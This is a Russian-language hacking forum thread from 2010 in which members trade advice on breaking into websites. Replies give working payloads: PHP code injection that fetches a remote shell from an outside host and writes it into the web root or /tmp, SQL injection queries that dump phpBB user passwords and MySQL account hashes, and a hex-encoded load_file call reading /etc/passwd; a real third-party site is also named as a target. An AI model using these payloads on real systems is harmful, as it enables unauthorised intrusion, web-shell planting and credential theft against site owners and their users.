Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. radikal

    radikal New Member

    Joined:
    6 Jun 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Я тут новичок и хотел бы спросить. Есть же хостинги, и у них хостятся сайты. Почему при взломе одного из этих сайтов (wso шелл) я могу видеть другие сайты и изменять их файлы, и всегда ли это????

    ответьте пожалуйста прошу
     
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    radikal, не всегда. Если хостер лол и нет защиты со смежными сайтами, то получив доступ к одному сайту, автоматически получаешь ко всем остальным
     
  3. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Ответьте плз.
     
  4. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    id=include("http://yoursite.com/yourfile");

    id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/

    например

    file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php

    если не знаешь полный путь к сайту to копируй шелл в папку /tmp

    потом делай локальный инклуд
    include("/tmp/shell.php");
     
    _________________________
    #13445 Konqi, 8 Jun 2010
    Last edited: 8 Jun 2010
  6. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Есть SQL inj.
    Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
    5 ветка.
    1,2,3,4,5,passwords,7+from+site_users--
    Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?
     
  7. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    1,2,3,4,5,schema_name,7+from+information_schema.schemata--
     
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ок, ну как вывести password указв при этом юзверя БД?
     
  9. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    select+1,2,3,4,5,password,7+from+mysql.user+where+user='имя юзера'
     
    1 person likes this.
  10. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    т.е. ?
    1,2,3,4,5,username,7+from+phpbb_users--
    и user() - u34129
     
  11. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
    Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
    select+1,2,3,4,5,concat_ws(0x3a,username,user_password),7+from+phpbb_users+where+username='имя юзера'
    и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password
     
    #13451 h00lyshit!, 8 Jun 2010
    Last edited: 8 Jun 2010
    1 person likes this.
  12. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Первый раз ты правильно понял :)
    мне как раз вот это и нужно
    Просто помоги составить запрос с теми данными
     
    1 person likes this.
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Тогда select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
    например select+1,2,3,4,5,password,7+from+mysql.user+where+ user='root'
    Либо select+1,2,3,4,5,concat_ws(0x3a,user,password),7+from+mysql.user+limit+1,1 и перебирай limit'ом
     
    #13453 h00lyshit!, 8 Jun 2010
    Last edited: 8 Jun 2010
    1 person likes this.
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    pervoe posmotri u tebya kakie bd (schema_name)
    select+1,2,3,4,5,schema_name,7+from+information_schema.schemata
    a potom posmotri table_name=>phpBB_users v kakoy bd ? naprimer imya bd test..i zapros budet..
    select+1,2,3,4,5,password,7+from+phpbb_users.test
     
    1 person likes this.
  15. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2LokbatanLi,
    Code:
    +from+test.phpbb_users
    , т.е. "имя БД.Таблица"
     
    1 person likes this.
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Здесь есть инклуд?

    http://agrovisual.com/index.php?action=av_show_image'&id=1104
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Опять 125, ошибка не значит инклюд, это просто немогут странички ошибки загрузиться.

    // Где ваша хакерская догадка люди?

    // Я читал этот топик ровно неделю, я стал седым.
     
    #13457 Ctacok, 8 Jun 2010
    Last edited: 8 Jun 2010
    2 people like this.
  18. zEr0r

    zEr0r Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    67
    Likes Received:
    28
    Reputations:
    14
    Есть доступ к админке CMS WebAsyst

    Есть способы как залить шелл?
     
  19. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    хей!

    если "load_file('/etc/passwd') нельзя, а load_file(0x2f6574632f706173737764) можно, то записать всё равно не получится?
     
  20. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Да, меджик квотес
     
Thread Status:
Not open for further replies.